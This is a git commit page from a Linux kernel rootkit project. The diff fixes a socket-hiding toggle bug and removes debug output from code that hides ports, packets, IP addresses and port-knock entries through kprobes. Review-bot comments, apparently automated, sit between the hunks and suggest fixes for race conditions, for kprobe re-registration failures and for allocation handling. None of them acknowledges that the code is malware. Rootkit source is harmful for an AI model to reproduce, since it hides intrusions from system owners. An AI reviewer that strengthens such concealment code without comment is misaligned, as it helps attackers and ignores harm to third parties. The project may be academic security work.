linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit 3842e8e2d75b76867c6c05fb8f81e2f40c77a340
parent dbb75ac6b15a47940b8f1025c7e506489441c999
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 10 Jan 2021 19:24:23 +0100

fixes socket toggling bug

Diffstat:
Msrc/channel.c | 1+
Msrc/packhide.c | 6------
Msrc/porthide.c | 15+--------------
3 files changed, 2 insertions(+), 20 deletions(-)

diff --git a/src/channel.c b/src/channel.c
@@ -206,6 +206,7 @@ handle_tcphide(unsigned long arg)
 hide_port((port_t)sarg, tcp4);
 hide_port((port_t)sarg, tcp6);
+ rootkit.hiding_sockets = 1;
 DEBUG_NOTICE("[g7] hiding tcp socket with port %ld\n", sarg);
 }
diff --git a/src/packhide.c b/src/packhide.c
@@ -47,7 +47,6 @@ void
 hide_packets(void)
 {
 if (atomic_inc_return(&packet_rcv_install_count) == 1) {
- DEBUG_INFO("___ HIDING PACKETS %d, %d\n", rootkit.hiding_packets, rootkit.hiding_sockets);
 p_rcv.pre_handler = g7_packet_rcv;
 p_rcv.post_handler = g7_post;
 p_rcv.fault_handler = g7_fault;
@@ -75,7 +74,6 @@ void
 unhide_packets(void)
 {
 if (atomic_dec_return(&packet_rcv_install_count) < 1) {
- DEBUG_INFO("___ UNHIDING PACKETS %d, %d\n", rootkit.hiding_packets, rootkit.hiding_sockets);
 unregister_kprobe(&p_rcv);
 unregister_kprobe(&tp_rcv);
 unregister_kprobe(&p_rcv_spkt);
@@ -90,10 +88,6 @@ hide_ip(const char *ip)
 u8 ipv6[16];
 if (strstr(ip, ".") && in4_pton(ip, -1, ipv4, -1, NULL)) {
- int test;
- memcpy(&test, ipv4, 4);
- DEBUG_INFO("val is %0X\n", test);
-
 if (!list_contains_ip(&hidden_ips, ipv4, v4)) {
 memcpy(ipv4 + 4, (ip_t){ 0 }, 12);
 add_ip_to_list(hidden_ips_tail, ipv4, v4);
diff --git a/src/porthide.c b/src/porthide.c
@@ -55,16 +55,13 @@ lport_list_t_ptr hidden_lports_tail = &hidden_lports;
 void
 hide_lport(lport_t lport)
 {
- if (!list_contains_lport(&hidden_lports, lport)) {
- DEBUG_INFO("hiding lport %d\n", lport);
+ if (!list_contains_lport(&hidden_lports, lport))
 add_lport_to_list(hidden_lports_tail, lport);
- }
 }
 void
 unhide_lport(lport_t lport)
 {
- DEBUG_INFO("unhiding lport %d\n", lport);
 remove_lport_from_list(hidden_lports_tail, lport);
 }
@@ -104,8 +101,6 @@ clear_hidden_lports(void)
 j = hidden_lports_tail;
 while ((j = remove_lport_from_list(j, j->lport)));
-
- DEBUG_INFO("cleared hidden lports and knocks\n");
 }
 bool
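Review bot: The new `rootkit.hiding_sockets = 1;` is a bare store to a global from the channel request handler, and the hunk shows neither a lock around it nor where the flag is cleared, so if hide and unhide requests can arrive concurrently the flag and the hidden-port lists can disagree. It is also set on every tcphide request, including one for a port that is already hidden, so whatever clears it must key off the ports still hidden rather than off the last request. Since the commit message says this fixes a toggling bug, the line should say what it gates, e.g. `/* flag that socket hiding is active; presumably read by the unhide path — confirm where it is cleared */`. handle_tcphide starts before the hunk, so the serialization may live there.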
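Review bot: In unhide_packets, `atomic_dec_return(&packet_rcv_install_count) < 1` lets the install count go negative on an unbalanced unhide, after which `atomic_inc_return` in hide_packets never returns 1 again and the kprobes are never re-registered — the same class of toggling bug this commit fixes elsewhere. `if (atomic_dec_if_positive(&packet_rcv_install_count) == 0) {` clamps the count at zero so a surplus unhide is a no-op and the next hide re-installs the probes. The comparison is on a context line, but it is new-side code the commit leaves in place, and unhide_packets's body continues past the hunk.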
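Review bot: In hide_ip, `strstr(ip, ".")` and `in4_pton(ip, -1, ipv4, -1, NULL)` both scan `ip` up to a NUL, so `ip` must already be a terminated string; the function's prologue and its caller (presumably the channel handler that copies the address in from user space) are outside the hunk, so the requirement is worth stating at the top of hide_ip, e.g. `/* ip must be NUL-terminated: strstr() and in4_pton(len = -1) both scan to the terminator */`. Separately, `memcpy(ipv4 + 4, (ip_t){ 0 }, 12);` is a roundabout `memset(ipv4 + 4, 0, 12);`, which also makes the zero-padding of the v4 entry obvious to the reader.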
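Review bot: hide_lport returns void and drops whatever add_lport_to_list reports, yet the add_lport_to_list hunk further down guards its `kmalloc` with `if (node)`, so an allocation failure leaves the port unhidden while the channel caller sees the same outcome as success. A comment on hide_lport saying the failure is deliberately best-effort, or a `bool` return the caller can surface, would make that explicit. unhide_lport likewise discards the return of `remove_lport_from_list`, which clear_hidden_lports in the next hunk relies on as the updated cursor; if find_lport_in_list walks only one way from its start node, searching from `hidden_lports_tail` here while list_contains_lport searches from `&hidden_lports` deserves a one-line comment stating which direction is walked.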
@@ -132,8 +127,6 @@ add_lport_to_list(lport_list_t_ptr tail, lport_t lport)
 node = (lport_list_t_ptr)kmalloc(sizeof(lport_list_t), GFP_KERNEL);
 if (node) {
- DEBUG_INFO("adding lport %d to list\n", lport);
-
 node->lport = lport;
 node->next = NULL;
 node->prev = tail;
@@ -151,8 +144,6 @@ remove_lport_from_list(lport_list_t_ptr list, lport_t lport)
 lport_list_t_ptr i = find_lport_in_list(list, lport), ret = NULL;
 if (i && (i->lport != -1)) {
- DEBUG_INFO("removing lport %d from list\n", lport);
-
 if (i->next)
 i->next->prev = i->prev;
 else
@@ -193,8 +184,6 @@ add_knock_to_list(knock_list_t_ptr *tail, ip_t ip, ip_version version)
 node = (knock_list_t_ptr)kmalloc(sizeof(knock_list_t), GFP_KERNEL);
 if (node) {
- DEBUG_INFO("adding knock to list\n");
-
 memcpy(node->ip, ip, (version == v4 ? 4 : 16));
 node->version = version;
 node->next = NULL;
@@ -213,8 +202,6 @@ remove_knock_from_list(knock_list_t_ptr list, knock_list_t_ptr *tail, ip_t ip, i
 knock_list_t_ptr i = find_knock_in_list(list, ip, version), ret = NULL;
 if (i && (!memcmp(i->ip, ip, (version == v4 ? 4 : 16)) && i->version != -1)) {
- DEBUG_INFO("removing knock from list\n");
-
 if (i->next)
 i->next->prev = i->prev;
 else
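Review bot: `node = (lport_list_t_ptr)kmalloc(sizeof(lport_list_t), GFP_KERNEL);` in add_lport_to_list casts kmalloc's `void *` and sizes the allocation by the type name rather than the target; kernel style is `node = kmalloc(sizeof(*node), GFP_KERNEL);`, which stays correct if the node type is ever renamed and drops the cast that the typedef'd pointer makes easy to get subtly wrong. The same shape recurs in add_knock_to_list two hunks down. Both functions begin before their hunks, so the declaration of `node` is not visible here.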
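Review bot: In add_knock_to_list, `memcpy(node->ip, ip, (version == v4 ? 4 : 16));` copies only 4 bytes into a node that came from `kmalloc`, so bytes 4..15 of `node->ip` hold uninitialized heap memory for every v4 knock, whereas hide_ip in src/packhide.c deliberately zero-fills those bytes of a v4 address before storing it. remove_knock_from_list in the next hunk compares only 4 bytes for v4, so it is unaffected, but any consumer that compares or copies the full 16 bytes would see garbage, and the padding difference between the two lists is a trap. `node = kzalloc(sizeof(*node), GFP_KERNEL);` (or a `memset(node->ip, 0, sizeof(node->ip));` before the copy) removes the difference; the allocation line is outside this hunk.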